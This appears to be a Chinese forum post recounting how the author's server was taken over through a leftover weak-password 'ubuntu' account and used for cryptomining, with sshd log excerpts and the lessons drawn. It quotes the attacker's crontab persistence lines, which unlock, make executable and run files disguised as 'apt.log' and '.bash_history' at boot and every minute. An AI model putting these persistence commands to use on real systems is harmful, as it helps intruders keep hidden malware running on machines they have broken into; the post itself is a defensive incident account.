网站子服务器被黑经历
先顺一下时间线Mar.15
配置好了一个beszel的面板监控(艹,我忘了给加告警通知了)
想要装个其他东西,提示我不要在sudo权限下运行,然后我创建了个ubuntu账户,密码是ubuntu弱密码,然后没搞成功,睡觉去了(™我忘删了啊!!!)
一小时后
Mar.16
凌晨00:09,一个IP是92.118.39.95的外国SSH弱密码爆破的IP成功登陆进来我服务器了:
Mar 16 00:09:18 serxxxx sshd: Accepted password for ubuntu from 92.118.39.95 port 44518 ssh200:40在我的服务器上面执行了把自己伪装成apt并且开机自启且定时执行的程序:
@reboot /bin/sh -c "(cd '/var/tmp' && [ -f 'apt.log' ] && (chattr -i 'apt.log' 2>/dev/null; chmod +x 'apt.log' && ./'apt.log')); (cd '$HOME' && [ -f '.bash_history' ] && (chattr -i '.bash_history' 2>/dev/null; chmod +x '.bash_history' && ./'.bash_history')); "
* * * * * /bin/sh -c "(cd '/var/tmp' && [ -f 'apt.log' ] && (chattr -i 'apt.log' 2>/dev/null; chmod +x 'apt.log' && ./'apt.log')); (cd '$HOME' && [ -f '.bash_history' ] && (chattr -i '.bash_history' 2>/dev/null; chmod +x '.bash_history' && ./'.bash_history')); "就开始在我的服务器上面跑
Mar.17
凌晨,我闲的没事登beszel的时候看到那台服务器CPU占用是100%,内存也很高,就登到ssh里面开btop看
看也看不出啥,就一个叫“apt”的程序占用最高,我就到云服务商那里重启了一下(我这步纯啥博弈)
问了问AI,看了crontab列表,就是上面这段代码,看了看系统登录日志,也是啥也没看出来,全都是被fail2ban挡了或者是防火墙拦了
又周旋了几分钟,我用好像是:
grep "Accept" syslog的查看了登录成功的日志,看到一个及其可疑登陆成功的时间,就在占用高开始前几十分钟Mar 16 00:09:18 serxxxx sshd: Accepted password for ubuntu from 92.118.39.95 port 44518 ssh2就是这个!到tx威胁情报上面查了,果然是爆破SSH的
就结束了...
这波我纯啥博弈
最后只能说提醒搞完测试之后一定要处理好测试用的一些东西啊!! 咱也就还好是啥也没干,不然还有数据的损失,最后感觉那个挖矿清不掉了我直接重装系统了 1708039100
页:
[1]